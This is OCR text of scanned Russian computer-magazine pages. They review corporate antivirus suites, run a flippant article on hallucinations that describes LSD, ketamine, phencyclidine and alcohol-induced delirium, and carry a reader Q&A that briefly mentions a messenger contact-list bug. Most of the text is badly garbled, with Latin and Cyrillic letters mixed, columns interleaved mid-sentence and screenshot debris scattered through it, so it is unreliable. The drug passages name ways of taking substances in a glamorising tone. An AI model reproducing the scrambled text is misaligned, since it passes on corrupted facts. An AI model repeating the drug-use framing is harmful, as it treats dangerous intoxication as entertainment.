ТhrеаrSепsесочетаетсигнатурныйанализ оценкой подозрительныеписьма перемеща- SYMANTEC ENDPOINT
со сложной н сбалансированной системой ются Е папку, созданную по умолчанию илн PROTECTION Пакет Sуmапtес Епdроiпt
расширенного эврнстического анализа кода указанную нользователем. Пользов ате.ль Рrotесtiоп 11.0 (SEP) ориентирован на защиту
(Аdvапсеd Нешistiсs), прн котором использует- может самостоятельно квалифицировать систем в комнаниях разного размера и объеди-
ся связка ДЕУХ методов -эмуллция и алгорит- сообщения, няетв одном решении несколько технологий,
мичеCIШЙ анализ пассивной эвристики, что в Непосредственное взаимодействие и управ- обеспечивающих нолноценную защиту систем
итоге обеспечнвает высокий процент обнару- ление КJIиентCIШМИ системами осуществляет отугроз всемирной наутины. Основные фун-
I жения неИзDестных угроз при низком нороге ESET Remote Access Selver (ЕRЛ Server, ERAS). кЦИИ заключены в КJIиенте SymaHrec Епd роiпt
ложных срабатываний. Кроме того, в состав Именно он выдаетвсе запросы на нроверку, Ргоrесt:iоп Сliепr (SEPC). Его версиидоступны
Smart Security ВКJIючен МОдУль нерсонального обновленне, производитнастройкии собнрает для большогоколичества ОС Windows 2000/
-~I
брандмауэра.Он заменяетштатныйфайрвол информациюо текущемсостоянииклиен- ХР /2003/Vista/2008 (32/64 бита), Liпuх (Red
и контролясостоянияЮIИентовиспользуется
женерепестипOJlИТИJ<Ии прочиенастройкис
родительскихсерверовSуmапteсAntiVjrus.ДJIЯ
пе WindOWS-IIЛатформустановкавозможна
только вручную, при помощитак называемого
«пеуправляемого»клиента (который,кстати,
тожеуправляетсяИЗ КОНСОЛИ).
подключенныIeклиеlrrыразБИ1!аIOТСЯна
групnы,ДJlЯKOТOpbI:Xустанавливаютсясвои
политик:
• антивирус;
• БРандМауэр;
• защита от вторжений;
• обповления (LiveUpdate);
• централнзованныиcклIoченил (CeIJtralized
Exceptions).
Настроекмного, ОЕШдостаточпоnонятныI'
хотя некотороевремя па освоение SEpM потра
Hat Enrerprise Linux, SпSЕ LinuxEnteI]Jrise возможностьих автоматическоговосста тить всеже придется. При определении задач
Server/Desktop, Novell Ореп Enterprise Server, новленияи перезanyска.ТехнологияTamper можно использовать шаблоны. впечатляет
UЬшnU и Debian 4.х), а таюкеVМWare ESX. Proteetion не позволяетВЬJЮIIOЧИТЬсерверные большое количество доступных OТ'IeTOB и
SЕРСЯRляется лоrnческим продоmкением НЮIИеlrrскиесервисылюбымспособом,втом сводок - по риску, про веркам, угрозам, ауДIПy
вирусо,В и пшнонскихпрограммКЭJ( методом Generic Exploit Blocking nОЗJ30ляет останав ной почте.
СШ'натурногоанализа,ТЭJ(И ЭВРИСТИJ<ой. ливать и блокироватьугрозы, ИСПОJIЬ3YIOщи:е Также ОThlетим наличие понятной утилиты
МодульПРОЭJ<:ТИвнойзащиты, получивший уязвимости приложений, а инструментVxMS Д)lЯ резервирования и восстановления базы
название Proactive ThreatScan, обнаружи (Veritas Mapping Service), имеющийдоступ на данны:х сервера, содержащей все установки.
ваетвирусы,щ,lТающи:есяпроникнyrьв более низкий сиcтeмныйровень,,способен
систему, основываясьпа анализе поведения обнаружитьи удалитьруткит. КASPEiRSКY TOTAL SPACE
приложениЙ.Реализованазащи:та от спама Купив ДОПОJJНительнуюлицеизию,можно S ЕСURIП Решение KasperskyTotal Space
(anti-spam) и филЬJ'Рацияинтерпет-трафИJ<а aкnmироватьмодуль Symantec NеtwогkЛссеss Security CКTSS),вьтускаемое<<Лабораторией
(web-filtering). Администраторполучаетв Сопtrol, обеспечивающийпроверкусистемпа Касперского»,предназначеноДJlЯ защи:тысети
процессам, файлам и каталогам, а таюке НbI:X права доступак сети и ресурсам.СИ<:темы ализированнаяверсияантивируса,причем
D Con,ole Root
ЕМ library (GR1NDERS\50phosEM) Properties
8-Ц1~ ЕМ Ubrary
f-~ мesще l.OQ
I~HB Package<
~. Primary рагеп! ISecondary рагеп! ] pa,enl is lhe 'oca~on ',от
~ Links
!-·1tI
r-1tI
АП
UlISubscribed
111 select the default parent for thi< Ibrary,
- WV\'W.eset.com.
;_.Q Сеntr al1n<ta11ations r цос path Iпonе\ ~rowse ...
• Сайт «Лаборатории ~..Ii!) Sd1edu1es
KaenepcKoro» - www. ! Waste Ып
kaspersky.ru.
• Сайт компании ackaget.
«Доктор Веб» - www.
drweb.eom.
,kstа~ОП$ аnd gloups о'
• Сайт компании
Symantec - _Vf.У:Ш.,
;?)'ffii2.0 tec.eom.
• Сайт компании
Sophos-www
.S...Q.P.hо'i..ШШ.
• Сайт компании :::..
MeAfee-www
OТ1'leнa
mcafee.com.
• Сайт компании
jNo scheduled updates
F-Secure - www.f
seeure.ru. УПРАВЛЕНИЕ ПОДКЛЮЧЕННЫМ КЛИЕНТом В ERA CONSOLE
Syrnbian), файловые серверыI (Wmdows, Linux, Samba, в KasperskyAdrn.inisttation Кit объедИЮJЮТСЯ в логическую
NetWare). Так, клиенгАнтивирусКасперского для Windows сеть. При автоматическом формированиилогической
Workstations совместим со всеми версиями Windows, вклю сети она совпадает с физической, но затем системы можно
чая 64-битные, и обладает всеми возможносгямл, которые сгрyrшиpовать по своим критериям. Каждая группа ШlИ
мыпривы:кливидетьвпродуктахзтогоразработчика: отдельный компьютер может иметь свои политики и
на корпоратив" HeкrOB, которые можно установить на разныхомпьюте SOPHOS ENDPOI'NT SЕСURIП АНО
с обзором Kaspeгsky рах. ХранениеJПЩензий, настроек, управление работой CONTROL 8ПродукткомnанииSорhоs-Sорhоs
Enterprise Space атетов и сбор ШIформации осуществляется па сервере Endpoint Security and Control8 таюке состоитиз нескольких
Security и DrWeb администрирования. Возможна одновременная работа частей, каждая из которыхотвечаетза свой участокрабо
Enterprise Suite. в одной сети нескольких серверов администрирования с ты. Клиенгскаячасть,доступнаяпод разные ОС, включаетв
Ролике настройкой поддержкой иерархии. себя антивнрусSophosAnti-Virus, персональный бранд
системы антивирус Администратор производит все настройки, подключив мауэр Sophos ClientFirewall. Отдельподоступен клиент
ной защиты Kaspersky I1Шсь к серверупри помощи консоли:, которая предстaRJIЯет управлениядоступом SOpllOS NetworkAccess Control. NAC
En te rprise Spaee собой оснасткуММс. Взаимодействие между сервером обеспечивает возможность управления сетевым доступом
Security ищи на диске администрирования н клиетским антивирусным ПРШlо
клиенто!) н карантин, а также контроль над подключе
рOlШКС настройкойКasperskyEnterpriseSpace Sеcurity).Для ТaJ<ИX, KaJ< игры, IМ, VoIP, Р2Р. Sophos HIPS обеспечивает
небольшогоофнсав качествеSQL-сервераможно вз.ять на обнаружение и защиту от еще неизвестныхугроз. Решения
стрamщезагрузкипродуктов «J1абораторииКасперского» для защиты электроиной ночты и борьбы со спамом SOpllOS
специалыryюверсию MSDE2000 SРЗ для Administration Кit. Ешэil Sесш:ityапd Control также придется устанавливать
Во времяустановкиона будет обнаруженаа:втом.атически. отдельно. Поддерживаются:клиекrскиеплатформы
Консоль администраторалокализованаи понятнав Windows от 98 доVista,MacOS Х, *nix,NetWare.
работедаже без обращениякдокуменгации.Все клиенты клиентыIринимаютTкоманды с серверауправления
fШ==:шшii:!!CG:!II!!Е!=- Ii;;;;======:"·"1!~--..J>JiI
~\!:IScheduIK
--@Wasbab:n
--_.iI
О {p~'''''o.
ult
~(r
~JIV'8C101
'<тI><>ir=т ••
_
'-'-,,·_'
С- - - -
]Г:;~:;;;:;;:-I
--- ,-~~
!р ~ IleGlo~,""''':''-.....
rc._.""",~.~_._ .I е...-; .. ,"",~.~~~.~.!
Q.r.-. __.......
P'1No/.",
P'1!">~,,,",.r,.,.,'"''''
,,~~,~-., •. ~, ~,·'V"·=·_.'
"
__ ~
~....e _ r_ _ Qo;_~"'" '1
--~-==:.:=---_._--------- ~ 1
~~ ...
интегрирована в Епtегргisе Console). Еще один комнонент- библиоте небольшого размера, в том числе, без штатного админа. Возможностей
ка ЕМ Libгary (Епtегргisе Manager) - обеспечивает загрузку оБНОI3JIе настройки здесь меньше, чем в показанныхвышерешениях, но в той
ний баз и комнонентов всех антивирусов Sophos на всех ноддерживае сфере, на которую они рассчитаны, в этом, наверное, и нет необходи
мыхплатформах.ДJщ удобства обслуживанияв большихсетях можно мости. Минимум установок можно считать скорее достоинством, чем
установитьнесколько серверов С ЕМ Library. При зтом администратор
недостатком.
~1
!J \ Глобальные зада.ч.., Л CTaнAapTНbl11 I
и~и Firefox, Скачиваем sеtuр-файл н устанавливаем его. для инcrа~ пользователя,активируютсяКЛЮ'm, выставляютсяпредупреждения.
ляции на остальных системах администратор отправляет сообщение В полигикепо умолчанию«Оп-Demand» сканирование незадействова
по е-шаil, содержащее спецнальную ссьику на файл (URL-метод). но - все настройки брандмауэра производит пользователь, а Оп -access
Собственно по эгому признахуклиентские системы и сопос:тавляются сканирование архивов и SiteAdvisor для браузера отклю'IеныI. Эти
конкретному логину, настройки неудобны, Например, брандмауэр «не знает» системные сер
AгeHTTPS защищает систему, работая в фоновом режиме и вынолЮIЯ висы и при первой загрузке задает много вопросов, ПользоваТeJlЬ, сделав
все операции автоматически. Хотя при необходнмости пользоваТeJlЬ неправи~ьны.й выбор, может запрос:то заБЛOlсироватьсеБе выход в Сеть
может вмешагьсяв процесс, выполнив проверку файла или обиовление RЛИДОСТУП к опреДeJIенным сервисам. Позтомулучше создать пову:ю
баз вручную, Системы с работающим TPS отправляют на центральный политику, выбрав «Add Policy», где, неремещаясь но BK~aдкaм, включить
сервер данные о своем состоянии и обнаруженных угрозах, где они Оп-Dеmand сканирование, а затем в настройкахбрандмаузравместо
становятся доступны администратору в виде OT'IeToB. «User сопfigЩ'еs firewall» выбрать <<Аdministrаto!'сопfigurеs бгewаll».
для централизованиого упраR~ения системами и получения OГJeTOB Обновления ска'Iиваются с цeHтpa~ЬHOГO сервера; реег-tо-реепех
администратор подключается к Network ОрегаtiопsСепtег (WWW. нология Rumor позволяет системам, нахоДЯщимсяв локальной сети,
mcafeeasap,com), используяе-шаil и пароль, введенный при регист обмениватьсяобновлениямидруг с другом, экономя трафнк, Работает
рации, Окно NOC содержит пять вкладок, но, в ОТЛИ'Iне от агентов, Rurnогоченьнросто. Система, подключившиськ NOC, обнаруживает
нелокализовано,В основной вкладке Sеспгity Сentегноказаночнсло оБНОR~ения и рассьmает по локалке широковещательныезапросы,
клиептскихсиcrем,их состояние, данные по защите и иснользованию чтобы нроверить их налИ'Iие на других системах, Если другие агенты
лицензий. Сами компьютерысобраны во вкмдке«Соmрutеrs»,где имеют старую версию, то система скачиваетоБНОR~ениеи устанав
их можно отобрать по разнымхарактеристикам.Вкладка «Repons» ливаетего. Следующий агент, обнаружив новую версию, поcryпает ана
содержит семь шаблонов отчетов. Все компьютеры распределяются по ЛОГИ'IНО, но теперь ему отвечает компьютер в ЛОКiJJIьной сети. Третьему
группам, JCaЖДая из которых использует назначенную еЙнOl,ЩТИКУ. Эти компьютеруобновлениепреР.~ожатужедвесистемы, в дальпейшем
Н8crрОЙКИДОС'LyrJНывовк~адке«Gгоuрs + Policies». После установки в процесс идет по нарастающей, Аналогично обновляются системы, не
списке присутствует только одиа политика - «Default Policy». Обпов имеющие выхода винтернет.
подключении к серверу {по умолчанию-обновление раз в12 часов). F-SECURE PROTECTIOIN SERVJICE FOR
Наконец, во вкладке "Му Account>, вынолняется настройкапрофюrя В USINESS Продукт от компании р- Secure - Ргоtесtiоп Service
МсАfи" I
Total Protection" Servke I 5ecurityCenter
Save
Add PoJicy
Poliey !l<Jme: I
"- ----'
\IIП\5 ProtectjoB
ОеskЮI) fiге''l/эll Bro~,ser Pro\ection (SitеА(МS{)f~j A(Mltlced Setti.1gs
~>On
Oif
~, RelJOn (00 ,юl bIock polenlially Ul1,VЭIНеd I)rograms, bu! гесого wl1al woulo hэуе Ьее'1 block~_d)
II
I
@ РГOlщl1 (ask the userv,hal 1000 if polenfialll' UПV1Эl11ed рmgГЭlnS аге. detecled)
"
О Protect (quа,апtiпе all polenlially Ul1'иаn1ео programs)
~~'"'''' '"9'''''
СОЗДАЕМ НОВУЮ ПОЛIИТИКУВ MCAFEE TOTAL PROTECТlON SERVICE ADVANCED
__ __
~
~ ~ .._. _"7
' , . ,... _ , . . " " ... ""',.. . . .....,.,._
-......,.,.",...--~-~.,...,~
_ . _. . . .T_ .... _ ..... " , ...... _ ' " . _ . , . _
_w_ ._._roo*_.
-:.,_ . .
"""'lDUlIo.:cnoo>a:'"
CO_,.
~"""""'"
:::-e..:...~=::-_~~=~::;,.."':r~,.,~_._~«f 0.:_
===::::::.-='.;:;.,~~=.:.~";'=~:.-' Ос,
(sпЬsстiрtiоп code), который также иснользуетсяпри активации ==:::::::::.:,':,;;-=:.:::,:..м:-...:::=.;,;-.w.--.,--.оn--'I 0.:,_
_ _,_,,--,,,,........--;a .... • ....._ ... ...._ ..
=~·~.::.=..-~~==.:.":=:T::·.:'::~=>Т.
доступны после регистрации. После ввода кода клиентская система
__ "'''+:-_u''"I\;
(;00:-,. _ _ ......",
)._~""""'_~T
c..,r_·H......... eq
......
..:
Именнотак' Пусть не екты), часто человек оказывается ПСЕВДОГАЛЛЮЦИ считаются. зто Io\MeHHO «образы»,
о
тормозит но и яркости способен критически относиться НАЦИИ возника ющие в состоянlo\и легкой
никакой - эффекты ксвqим галлюцинациям - напри Отличаются отистинных несвя полудремы .
отражений JYсклые мер, Крис Касперски, как только занностью с KOH~peTHЫM органо" • ДеПРИ8ацlo\Я сна - длительное
красивые взрывы и прочие начинает видеть В зеркале что-то чувств, человек их ощущает воздержание отсна в опреде
фейерверки встреча ются редко а неправильное !СВОЙ хвост, напри каки,,-то внутренним, хитры" ленном проценте случаев ведет к
разные многоцветные голограФи Mepl, тут же идет пить нейролепти чувством - в голове голос звучит зрительным и слуховым галлю
ческие фигуры фракталы и гало ческие колеса, которые избавляют сам собой, там же появляются цинациям. Психонавтами зтот
найти почти liевозможно. В рамках его от зрительных глюков После неприличные или угрожающие способ практикуется. Здоровью
этой статьи продолжающей этого он закидывается психости изображения, или вовсе кто-то не способствует и при менять
тему из предыдущего][ -Psycho муляторами и садится работать за живет. Канонически" примером зтот способ не рекомендуется.
!статья "день Зависимости»! мы комп. псевдогаллюцинации можно Во время сдачи номера вбылые
рассмотрим тему галлюцинаций. К слуховым галлюцинациям от считать «карлика, который живет времена мы по двое суток сидели в
Начнем мы с рассмоч)ения клас носятся как простейшие звуки, в голове, правой ногой подпирает редакции, нодо глюковдосижи
сификации этих милых чудачеств шумы, обрывки слов или фраз, извилины и мешает ду"ать». Сам вать не удаsалось. ПодрЬбнее о
нашей психики IШJYка обширная так и полноценные моно- и диа понимаешь, трудно придумать депривации сна можно прочитать
и заумная зато интересная и нуж логи. Эти разговоры могут как орган чувств, который "ог бы В статье «Над пропастью сновиде
ная\ а Затем перейдем кописанию комментировать про исходящее явить человеку такого злобного ний», опубликованной в майском
Состояний и способов ведущих к [человек что-то делает, а «голос» инсайдера внутри собственного номерехза 2008 год .
появлению галлюцинаций. - комментирует; хорошим при теЛа • Галлюцинации в результате
Истиннаj1 галлюцинация - это Штирлица в известном сериале), Да, здоровыхлюдей тоже могутпо Строго ГОВОРЯ,последние
восприят~е без обьекта, при так и угрожать (человеку или его сещатьсамые наСТОЯЩlo\е глюки. К два типа нельзя отнести к
котором, человек видит, слышит, близкимl, приказывать ["воруй, абсолютной норме относятся: варианту нормы, поскольку
обоняет и ощущает то, чего не убивай, поджигай и вступай в • Гипна гогические и ГиПНОПОМПIo\ провоцируются необычными
сущесчует. Эти галлюцинации интимные отношения с гусями»]. ческие гаЛЛЮЦlo\нации. Первые 80З для человеческого организма
«связаны» С органами чувств, они Последние два вида наиболее Нlo\каютпризасыпании, на границе условиями
кой и "'10 ryт быть злементарными вать, что его кто-то схватил Как пустой и темный коридор. В дверь
- вспышки света, точки, молнии, видишь, в основном тактильные никто не стучал - это был глюк лед
штрихи, линии и прочие примити галлюцинации отрицательны Кстати, яркие и приятн'ые оqразы, На самом деле с глюка генными
В ы. Н есмотря на то, что исти Н Н ые по своей сути - на ощущение которые мелькаютпереД глазами зффектами ЛСД человечество
глюки воспринимаются совершен ползания по телу трех массажисток В качестве резулыатадействия познакомилось гораздо раньше
но естественно [или даже более из Та йланда пока еще никто не опиатов или избытка зндорфИН08 выделенt~я Альбертом Хофманном
естественно, чем реальные обь жаловался. после хорошего секса, глюками не чистого вещества. Дело втом, что.
И.Г.: Если знакомый точно понимает, что он видит в зеркале то, чего нетна самом деле
::х:: Как на счет обращения в частную контору? Ну, чтобы без справок-реестров
списков ...
И.Г.: Отчасти ответ на первый вопрос описывает эту ситуацию. Частный доктор не
имеет права применять меры принуждения, поэтому при малейшем намеке, что вам
И.Г.: Увы, зто не простудное, само не пройдет. Тут ситуация однозначная - либо вы
И.Г.: Если под своими силами понимать самостоятельные попытки напугать отра
жение чертей в зеркале -так чертей зто не испугает. Они не на мирные переговоры
вашем моэге. Поэтому попытка "справиться самому» - зто примерно как вытаскива
ние себя за волосы из болота. Звучит красиво. является основой для захватывающей
И.Г.: Если будете бояться слишком долго и перестанете понимать, что больны - от
станет спрашивать вас, когда ей перестать подчиняться вашим желаниям. Она, соб
Буквально.
И.Г: Честно сказать, ответ на этот вопрос всегда вызывает во мне некоторую борьбу.
опасения. Кто его знает, какой приказ он отсвоих «собеседников» получит или какую
картину увидит. Жертвы могут быть. С другой - ну не могу я без конкретной ситуации
- исключены полностью.
Решите, что для вас важнее - риски вашего состояния сейчас [если под влиянием
бреда или депрессии вы прыгнете с крыши - вряд ли в будущем вам понадобятся
Еюдительские права! или иллюзорные перспективы «через 20 лет». Эти 20летнадо
еще прожить ...
·.=- ..... unit$
ДЛ К содержится в спорынье
~ 11' р_к L ГОО<Н 1iliJ-
паразитическом грибке, пора
,'~pet:~ ЬС:\PRОGZ'\ос.Т.rno;J16~~~LJAG::\IV\IМl1,Iн\RE,LдX\VlAD[мО lv'~_flepeXOA
жающем злаковые растения. В
стародавние времена спорынья,
симптомокомплексе играли не
царским ученым. Строго говоря, исп ыты вать постоя н ную смену на
ОБЕЩАННАЯ КНИГАХОФМАННА. передаваемые словами ощущения еся молодые люди, так что смело
относятся к оружию массового поражения из групп ПСИХОllfИ на кишку, либо втягивая порошок В тебе не ликер "Бейлиз» с водкой
метических ядов. хобот. Бывалыеторчки пишут. что смешивать:!.
t
Его достоинства - низкая доза (достаточно нескольких тысяч для кетаминоsого оттяга большое Что касается фенциклидина, то
молекул на человека, - вдумайся в эту фразу, сопоставь ее с значение имеетустановка на кайф, по его поводу можно сказать сле
миллиардами нейронов), высокая эффективность (без башни не позитивный психический настрой дующее. Во-первых, именноон [а
повоюешь) и нелетальность (людей никто не травит, не парализует и хорошая музыка [в принципе, вовсе не кокаин) первым в ИСТОрl<И
и не обжигает). для всех галлюциногенов это заслужил кличку"ангельская
во-первых, он исступленно блевал химикуАльбертуХофманнуГаллю кетамина нехарактерно. а харак ства оноотличалось избыточным
в специально выкопанную ямку циногенныйэффект псилоцибина, терно - ощущение распада мира количеством побочных эффектов,
[пейот - мощное рвотное сред содержащегос.яв нескольких видах и музыки на кусочки, составные а вотс точки зрения психонавтов
ство). а во-вторых - испытывал грибоs. в целом похож как на ЛСД части, ощущение вращения пред - наоборот, оказалось весьма
галлюцинации. Ничего необычно [по словам очевидцеs - менее метов вокруг себя Видения также позитивным - хорошо вставляет,
го в них нет- на фоне общей за яркий, более естественный), так и не эйфоричны и могут БЫ1Ъ даже легко про изводится И комбиниру
торможенности возникают глюки на мескалиновыетрипы. пугающи. но страх этот не фикси ется с другой на ркотой.
различной (часто - религиознойi рует на себе нашего подопытного
тематики, ощущение «видения КЕТАМИН И ФЕНЦИ и не оставляет неприятного осадка АЛКОГОЛ1ЬНЫЕ
себя со стороны». "Религиозным» КЛИДИН В душе после трипа, поэтому ни ТРИПЫ
свойством активно пользовались Совершенно приличные веще какого дискомфорта в этом плане Как выглядит с точки зрения
давние потребители колючей ства, по роду своему и племени нарки не отмечают. В принципе, обывателя напивающийся до
дряни -древние индейцы. Более относящиеся к лекарственным кетаминовая наркомания сейчас глюков человечище? Выглядит
менее современный индеец по средствам. Кетамин и сейчас не так распространена, как в ВО-е, онтак:«некийкалдырьпьетден~
имени Дон Хуан, по слухам, при используется как средство для когда этот препарат было гораздо пьет два, пьет неделю. Мешает
бегал к атому средству в процессе внутривенного наркоза, а для проще достать. К сожалению, напитки, переходит на дешевое
обучения Карлоса Кастанеды. что, предупреждения его га)lЛЮЦИ вте времена им баловались и спиртное, настойку боярышника,
очевидно. не могло не оказать ногенных и психоизменяющих некоторые доктора. Об ЭТОм ты антифриз. морилку И политуру и
своего влияния на головной мозг побочных зффеКТО8 врачи npaK можешь прочесть в книге«Три не В итоге допивается до белочки».
данного графомана. тикуют совместное назначение дели из жизни лепилы» [зачетный Особо продвинутые обыватели
используют популяризован~ый
детства по фильму"Кавказская
пленница», где геройДемьяненко,
циикоррумпированныхчиновни
алкоголиков со сформированной
физической эависимостью и
ПСИХИЧЕСКАЯ ЗАВИСИМОСТЬ iHE ЗАСТАВЛЯЕТ СЕБЯ ЖДАТЬ
абстинентным СИНДромом Iпом
нишь ПР9ШЛУЮ статью?]. Типич
ный клиентбелочки - алконавт, компьютерногодела -задача ные персонажи - пауки, змеи, воздеЙСТВLo\ем, огнестрельным Lo\
переста,ВШИЙ употреблять питие, позитивная. Кстати, это явление черви, летучие обезьяны и тому холодным ОРУЖLo\ем, очищающLo\М
либо снизивший его дозу [немного относится к иллюзиям). подобная нечисть, отрицательные пламенемl. Кстати, факт борьбы с
забухаlj,ШИЙ трезвенник белочкой Поначалу эти элементарные галю персонажLo\ из потустороннего порождениями нездоровой души
болеть неспособенi. На З-4день ны возникаюттолько в вечернее мира - черти и демоны (фраза совсем не гарантирует безопасно
после запоя 'а не во время eroly 8ремя, отступая днем, что дает «гонять чертей» В народе исполь сти окружающих - в жене безумцу
пьяницы на фоне его обычныхаб нашему подопытному некоторый sуется не зряl, отрицательные видится чеченский террорист. а
стинентныхсимптомов появляется шанс обратиться за медицинской персонажи из мира реального кошка - вовсе не кошка, но злой
страх, тревожность,змоциональ помощью. Со временем проблема - международные террористы, космический монстр. На окне уже
ная неУСТОЙЧИВОС1Ъ,постепенно прогрессирует, галлюцинации чеченцы, вражеские снайперы лежат OCTaHKLo\ трупов съеденных
появляются герои нашего сегод обретают сложность, реальность, и сомалийские пираты, которых иубиенных, с карниза СВLo\сают
нР.шнего повествования.Сначала сюжет, они начинаЮТПРОЯ8ЛЯТЬСЯ наш алкоголический друг с удо кишки, а цветочный горшок на
герои эти злементарны - звуки, И днем. Характер галлюцинаций. вольстаием проецирует в свою. полнен КрОВЬЮ до самых краев.
шорохи, шумы [наверняка, порож как нетрудно догадаться, почти реальную.обстановку. Все эти Quake отдыхает. В общем. со
денные Букой или Бя I<,ой , которые. всегда пугающий. Все зависит от гаЛЛЮЦLo\нации очень красочны, стояние это опасное, поскольку
прячутся там, эа эанавеской !I, сохранившихся вычислительных убедительны и пугающи - одер галлюцинации в нем тесно свя
тени, вспышки света идвижения способностей головного КОfща жимый алкогольным демоном заны с бредом воздействия и/или
обычно неподвижного рисунка на подопытного и воспоминаний И:У человек совершенно реально преследования, что провоцирует
обоях, паласе и кафеле·[т.е. мозг его прошлой жизни Ic чем стал бежит, скрывается, борется с клиента на опасные действия. С
совершает работу по анимации не кивался, чего боялсяi. Обычно в ними всеми доступными способа подобнымLo\ персонажами обуче
подвижных текстур, сточкй зрения глюках ПРLo\сутствуют зооморф ми lигрой в прятки, физическим ны взаимодействовать советские
милиционеры и бригады психиа него, галюны в рамках него автора в истории З0мбоящикаj. дозы алкоголя /50-150 грамм
тров «03", РЯДОВЫМ гражданам с преимущественно слуховые Воистину жестокое наказание водочки] подопытный вдруг резко
ними лучше не пересекаться I~ в - алик слышит голоса, - ком за пьянствоl В большинстве слу дезориентируется, впадает а
переубеждающиебеседы не всту ментирующие, прикаэываЮЩ~lе, чаев у безумца остается критика свои собственные, не относя
пать [бредящего человека нельэя обсуждающие Иногда этих го к происходящему [в отличие от щиеся к реальной обстановке,
переубеД~IТЬлогическиl.У него лосов несколько, они вступают в делирия, больной понимает его переживания, дейсгвует сооб
свои rлюки, у нас свои J высоконаучный диспут, благода иллюзорность]. Например, од разно искаженной нездоровым
ря чему наш подопытный может нажды ко мне в больницу пришел сознанием обстановке, стано
Алкогольный галлюциноз. стать перманентным участником допившийся до глюков дяденька, вится суетл ивым, выкри кивает
Более спокойное психотическое раi;\иоверсии шоу Малахова которого очень беспокоила зву отдельные слова ~I фразы lобычно
расстройство, основное про младшего [родственные отно чащая В голове музыка Причем, угрожающего или приказного
явление которого - истинные шения Малаховых не доказаны. с его слов. музыку ОН мог за xapaKTepal- знай, это оно и есть.
rаллюцинации. Возникает оно возможно, эта новость порожде казыватьсам. поэтомуя не сразу Начинается расстройство внезап
как во время запоя. T~K и после на недостаточными познаниями понял су'ГЬ его недовольства (на но и внезапно же эаканчивается
П с и х о н АВТ - человек, занимающийся исследованием своего да и забрали его в дом с желтыми вое поми на Н и я о былом содо I·~ И че
сознания и использующий ДЛЯ этого различные методики, в том окнами. ском угаре
П с и хоз Ы - группа психических расстройств, сопровождающихся . становятся участниками бреда ном слове я заканчива ю свое се
ПРОДУКТИВНОЙ психопатологической симптоматикой - бредом, преследования или отношения годняшнее повествоаа ние Веди
галлюцинациями, псевдогаллюцинациями'и др. «Продукция» В (особенно если голоса угро себя хорошо, кислотой не злоупо
данном СЛyiше-'вовсе не положительный термин, Грубо говоря, жающие). Кроме того, он может требляй, до белочки не допивай
01;/ означает, что мозг производит всякую фигню вместо правиль СОПРО60ждаться тревогой и/или ся, в объятия сект-поклонников
Иначе говоря, если человек думает. что микроволновая печь воз тате чтения ::х::ты приблизился
действует на его мозг космическими лучами, и переубедить его Патологическое опьянение. куровню Криса Касперски не
никак невозможно - это бред и есть. Переубеждать бредящего Это остро развившееся психо только в умственно- техн ическом.
смысла не имеет, твои аргументы он включит в структуру бреда, тическое расстройство на фоне но и в душевном плане, не от
про'сто не воспримет или даже тебя поколотит. приема небольшихдозалкоголя. чаиваЙся.Во-первых, немножко
В отличие от предыдущих трипав, ГЛЮКОВ ~ не такая высокая плата
препараты, применяющиесядлялечения психозов, К былинным, возникаету людей, алкоголиз цивилизация сделала совре
стоявшим на вооружении карательных психиатров древности ан мом не страдающих и кзапоям с менных психиатров слаБЫМ~I, а
типсихотикам относят аминазин и галоперндол. В настоящее время абстинухой не склонных. Имеет демократия и гласность погасили
их синтезировано настолько много, что даже не имеет смысла пере оно несколько форм, в рамках этой огонь в их душах; насильствеГlНО
числять, Кстати, при отсутствии нейролептиков наказательные статьи нам интересна только одна вдурдом можнозагреметыолько
психиатры практиковали введение в крупные мышцы тела раство - галлюцинаторно-параноидная с суицидальной поп ыткой или
расеры в персИl(ОВОМ масле. Уколы этого зелья резко болезненнь/, форма патологического опьяне обществеННО-ОI'1асным поведе
что ограничивает основные движения, «успокаивая» больного. ния. Распознать эту форму просто: нием. Все остальное - строго по
если после приема небольшой желанию.::Х;
OJ)
о о
GJ) ~
о
о о
~ о
~
О
о
/
о
О: Хочу новить К себе на сайт полноценный А: Если ты заядлый польЗ0ватель WordPress rpc.icerocket.com:10080/
бесплатно?
то, помимо стандартного !lttp:Urpc.pingomatic.
А, Соорудить полноце ный SSL -сертификат
сом, сове'Гую 8 список пингуемых сервисов Все перечислеГlГlыесервисы оченьлюбят
бесплатно утебя врядл де получится /если.
добавить следующие сайты: поисковики,так что, добавляя новую статью
конечно. не считать таков м самоподписанный на свой блог, будьувереГl,что ПОЛь30вателис
сертификат!. но вот заказат оный стриальны blogsearch.google.com/ping/RPC2
легкостью смогут найти ее.
ми ограничениями на30 или 90дней вполне api.feedster.com/ping
freessl.slJ. api.my.yahoo.com/rss/ping
наЙ1fИ списокактуальныхIP-аАресови строк с
rpc.weblogs.com/RPC2
Также сервис поэволит тебе добавить свои
: Какие сервисы для оповещение поискови topicexcl1ange. com/RPC2
айпи и юзерагенты для разоблачения ковар
ков об обновлениях на моем сmью
j])tиr1tJ1Ш1!rrI!»IIаеwь? V xping.pubsub.com/pingl
ХДКЕР 06/126/09
v
О GJ)
о
листжертвы, либо отправить жертве любое Страна -IP"J. ИЗ всех предложений.при - недостаточно гибкая
сообщение или запрос авторизации Iплюс. сутствующихв интернете, мне больше 8сего
если жертва найдеттебя в поиске и посмотрит нравится бесплатная WIP-Base от \NI РГГ!дПl<J 2. OOJo -Jаvаsспрt инструментарий [h11Q;LL
твое инфо).
СОГП (остальные GеоlР·базы ты легко сможешь dоюtQQlkJt.огаJ
)
Также с помощью зтого бага можно сделать но
мер невидимку 8 контакт-листе всетой же не
добавили. В итоге, ты будешь присутствоватьв 1. О на доступ на в SQL, ею R. текстовом форма 3. jQueгy - известнейшая JаvаSсгiрt-библиоте·
контакт-листе[к примеру, в «Моя группа [1/1 )"J, тах: ка IhtlQ:!/jguerv.conll
но тебя просто-напросто не будет видно :]. Под 2. Обновление WIР-базы осуществляется + хороший набор компонентов
робнее об уязви мости ты сможешь проч итать каждые два месяца; + прозрачность разработки
тут: sесuгitуlаЬ.гu/vulпегаЬilit\l/368757 .QhQ и тут: 3. Проверкабазы может происходитьавтомати
forum.asecl)ka.ru/shov;lhread.QhQ?t= 110269. чески и мануально. 4. Google Web Toolkit - инструментарий для
Также советую обратить внимание на другие Java- разработчи ков от Google шtlр :!!code.
О, Хочу моннтормть свой сайт ка предметучас различные примочки к базе: WIP-АРllудобное gQ.Qg le. com!'.-·"ebtoolkit]
тия в выдаче помсковыхсмстем. Как это проще апи для разработчиков),WIР-Рlugiп [WorldlP + все делается автометически
всего можно сделать? плагин для Mozllla Flrefox! и WIP-Map IIP-аАре - не совсем читабельный код на выходе
